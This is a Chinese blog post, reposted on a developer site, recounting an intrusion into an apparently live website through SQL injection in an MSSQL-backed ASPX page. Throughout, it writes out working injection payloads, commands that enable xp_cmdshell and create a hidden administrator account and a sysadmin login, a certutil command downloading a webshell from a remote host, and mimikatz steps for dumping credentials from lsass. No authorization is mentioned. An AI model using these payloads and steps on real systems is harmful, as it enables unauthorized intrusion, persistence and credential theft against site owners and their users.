一次曲折的注入

栏目: 数据库 · 发布时间: 5年前

内容简介:显示登录成功,则是命令执行成功,成功开启xp_cmdshell,然后可以执行命令了,但是执行命令没有回显,正常现象;直接添加用户,显示执行成功,但是没有用户添加上,郁闷,之后才发现是火绒的问题。执行cmd获取回显:

之前写了好多的实战文章,由于敏感都在本地记录了,等网站漏洞修复完成之后慢慢的分享一些思路和技巧。本文首发于tools,然后在博客转载。一次偶然发现了一处注入,apsx注入,之前练得少,决定试一试看看,先sqlmap跑一波。

一次曲折的注入 一次曲折的注入

500报错,可能跑不出来,于是试试手工,sqlmap被拦了,但是手工很顺利,可能是加了sqlmap的指纹了吧;

一次曲折的注入

判断版本’ or @@version>0 –

一次曲折的注入
计算机名 ' or @@SERVERNAME>0 --
爆当前数据库名 ' or db_name()>0 --

网站没有找见后台,想着跑出来密码也没有登录地方,于是那些查找数据库、表名、字段名就直接略过,跑出来也登不进去。先看看其他网站,于是先跑一下二级域名以及旁站,bing查询确实很棒,可以查出好多旁站,极力推荐;

发现三处旁站,一个 php 的、一个oa还有一个致远协同,没有可以利用的地方,还是先看看注入吧;

先看注入, 当前用户 ‘ or user_name()>0 –

一次曲折的注入

判断是否支持多句查询’;declare @s int;–

一次曲折的注入

查看一下xp_cmdshell是否开启

一次曲折的注入

首先开启一下xp_cmdshell

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

显示登录成功,则是命令执行成功,成功开启xp_cmdshell,然后可以执行命令了,但是执行命令没有回显,正常现象;直接添加用户,显示执行成功,但是没有用户添加上,郁闷,之后才发现是火绒的问题。

';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--
';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd获取回显:

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表
';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中
' and (select substring((select a from temp for xml auto),1,8000))>0;-- 可以一次得到所有的结果
';drop table temp;--  删除表

一次曲折的注入 一次曲折的注入 目标显示开启了1433,3389,3306端口,于是可以添加sa用户然后远程连接,增加sa用户:

';exec master.dbo.sp_addlogin test,password;--
';exec master.dbo.sp_addsrvrolemember test,sysadmin;--

可以直接连接,方便好多,比刚才执行命令舒服了好多;

一次曲折的注入

完美,可以直接执行命令,美滋滋。CS或者Msf直接撸之,但是没有vps就很心疼啊,只能找个 shell 远程下载了。发现旁站php的配置文件,然后还有phpmyadmin,这里有几个思路拿shell:

直接远程下载到web路径;
旁站phpmyadmin后台拿shell;
旁站登录后台拿shell;

第一个:

直接下载,然后,或者直接下载wce或者procdump.exe直接读取管理员密码然后登录,美滋滋。

certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php
move conf1g.php  E:\xxxxx\   失败

直接500报错,看来是有waf,难怪slamp一直跑不出来,直接换个过狗的吧

一次曲折的注入 一次曲折的注入 一次曲折的注入

第二个:

phpmyadmin后台登录几种建表方式没有成功,然后日志写shell也没有成功

一次曲折的注入 一次曲折的注入

第三种

php站进入后台拿shell,密码还没有解开,暂时无法登录拿shell

还是用第一种方法吧,最近发布的冰蝎管理shell,免杀还是不错的,大马带小马,可以简单操作了

一次曲折的注入

抓hash

wce 失败

Procdump导出,使用mimikatz

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonPasswords full

一次曲折的注入 成功拿到密码登录,直接登录之,之后就不截图了,进去之后发现已经有人光顾过了,有点厉害。


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

About Face 2.0

About Face 2.0

Alan Cooper、Robert M. Reimann / Wiley / March 17, 2003 / USD 35.00

First published seven years ago-just before the World Wide Web exploded into dominance in the software world-About Face rapidly became a bestseller. While the ideas and principles in the original book......一起来看看 《About Face 2.0》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具